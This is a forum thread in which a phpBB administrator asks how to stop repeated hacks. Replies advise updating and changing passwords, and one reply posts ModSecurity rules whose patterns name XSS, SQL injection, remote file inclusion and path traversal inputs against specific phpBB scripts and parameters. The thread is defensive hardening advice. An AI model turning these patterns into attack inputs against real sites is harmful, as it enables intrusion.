Prevent Forum from Hacking

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
Ankushforyou
Forum Newbie
Posts: 2
Joined: Sat Sep 02, 2006 11:37 pm

Prevent Forum from Hacking

Post by Ankushforyou »

Hello,

Now in a days my forum has been hacked in twice thrice .

I need to know , how do I protect my phpbb forum from hacking . What is the precaution I should take for the same .

Thanks in Advance for your Help...!


AnkuShforyou...!
matthijs
DevNet Master
Posts: 3360
Joined: Thu Oct 06, 2005 3:57 pm

Post by matthijs »

Have you updated to the latest version? Have you changed your passwords? Are there other scripts on the same server which might be vulnerable (and therefore a place were hackers can get in)?
User avatar
hanji
Forum Commoner
Posts: 46
Joined: Fri Apr 29, 2005 3:23 pm

Post by hanji »

matthijs wrote:Have you updated to the latest version? Have you changed your passwords? Are there other scripts on the same server which might be vulnerable (and therefore a place were hackers can get in)?
As matthijs said.. updating the code would be a wise move. Do you have control of the server you're on? Meaning, can you adjust apache settings or install software? If so, you may want to look at mod_security to help stop the script attacks. Another solution, server based is implementing snort and snortsam to block at the firewall level based off of signatures.

ModSecurity
http://www.modsecurity.org/

Here is a set of modsec rules for phpbb from gotroot (http://www.gotroot.com/tiki-index.php?page=mod_security+rules)

Code: Select all

# WEB-PHP phpbb quick-reply.php arbitrary command attempt
SecFilterSelective REQUEST_URI "/quick-reply\.php" chain
SecFilter "phpbb_root_path="


#phpbb
SecFilterSelective REQUEST_URI "admin/admin_styles\.php\?mode=addnew\&install_to=\.\./\.\./"

#phpbb XSS
SecFilterSelective REQUEST_URI "/posting\.php\?mode=reply&t=.*userid.*phpbb2mysql_t=(\<(script|javascript|about|applet|activex|chrome)|(http|https|ftp)\:/)"


#phpbb XSS
SecFilterSelective THE_REQUEST "/admin/admin_forums\.php\?sid=.*" chain
SecFilter "(forumname|forumdesc)=*\<[[:space:]]*(script|about|applet|activex|chrome)"


SecFilterSelective REQUEST_URI "/poc_loginform\.php\?phpbb_root_path=(http|https|ftp)\:/"
SecFilterSelective REQUEST_URI "/poc\.php\?phpbb_root_path=(http|https|ftp)\:/"


#phpbb 2.0.13 download vuln
SecFilterSelective REQUEST_URI "/downloads\.php\?cat=.*(UNION|SELECT|delete|insert)*user_password.*phpbb_users"


#phpbb p[lus
SecFilterSelective REQUEST_URI "/groupcp\.php\?g=.*sid=\'"
SecFilterSelective REQUEST_URI "/index\.php\?(c|mark)=*\'"
SecFilterSelective REQUEST_URI "/portal\.php\?article=*\'"
SecFilterSelective REQUEST_URI "/viewforum.php?f=.*sid=\'"
SecFilterSelective REQUEST_URI "/viewtopic.php?p=.*sid=\'"
SecFilterSelective REQUEST_URI "/album_search\.php\?mode=\'"
SecFilterSelective REQUEST_URI "/album_cat\.php\?cat_id=.*sid=\'"
SecFilterSelective REQUEST_URI "/album_comment\.php\?pic_id=.*sid=\'"
SecFilterSelective REQUEST_URI "calendar_scheduler\.php\?d=.*&mode=&start=\'">"


#General [url] php forum protections (phpbb and others, to protect against script injection attacks in url links)
SecFilterSelective THE_REQUEST "\.php\?" chain
SecFilter "\[url=(script|javascript|applet|about|chrome|activex)\:/.*\].*\[/url\]"


#phpbb wormsign
SecFilterSelective THE_REQUEST "echo _GHC/RST_"


#phpbb xss, sql injection and PHP code injection
SecFilterSelective REQUEST_URI "usercp_register\.php" chain
SecFilterSelective ARG_error_msg "<[[:space:]]*(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>"
SecFilterSelective REQUEST_URI "login\.php" chain
SecFilterSelective ARG_forward_page "<[[:space:]]*(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>"
SecFilterSelective REQUEST_URI "search\.php" chain
SecFilterSelective ARG_list_cat "<[[:space:]]*(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>"
SecFilterSelective REQUEST_URI "usercp_register\.php" chain
SecFilterSelective ARG_signature_bbcode_uid "((select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]|\'|UNION.*SELECT.*INTO.*FROM)"
SecFilterSelective ARG_signature_bbcode_uid "(<.*php|<php)"


#phpBB foing Module "phpbb_root_path" File Inclusion
SecFilterSelective  REQUEST_URI "(index|faq|song|list|gen_m3u|playlist)\.php" "chain,id:390053,rev:1,severity:2,msg:'JITP: phpBB foing Module phpbb_root_path File Inclusion'"
SecFilterSelective ARG_phpbb_root_path "((ht|f)tps?:/|\.\./\.\.)"


#General phpbb_root_path vulnerabilities
SecFilterSelective ARG_phpbb_root_path "((ht|f)tps?\:/|\.\./)"  "id:390070,rev:1,severity:2,msg:'JITP: Generic phpbb_root_path exploit'"
Hope this helps. Also, some hosts (ie www.dreamhost.com among others) offers mod_security as a feature with their hosting.

hanji
User avatar
RobertGonzalez
Site Administrator
Posts: 14293
Joined: Tue Sep 09, 2003 6:04 pm
Location: Fremont, CA, USA

Post by RobertGonzalez »

The most important thing is to make sure that you are running the most recent version of phpBB and the most recent versions of all the other software that is residing on your server.
User avatar
Ollie Saunders
DevNet Master
Posts: 3179
Joined: Tue May 24, 2005 6:01 pm
Location: UK

Post by Ollie Saunders »

How was the hack achieved?
Post Reply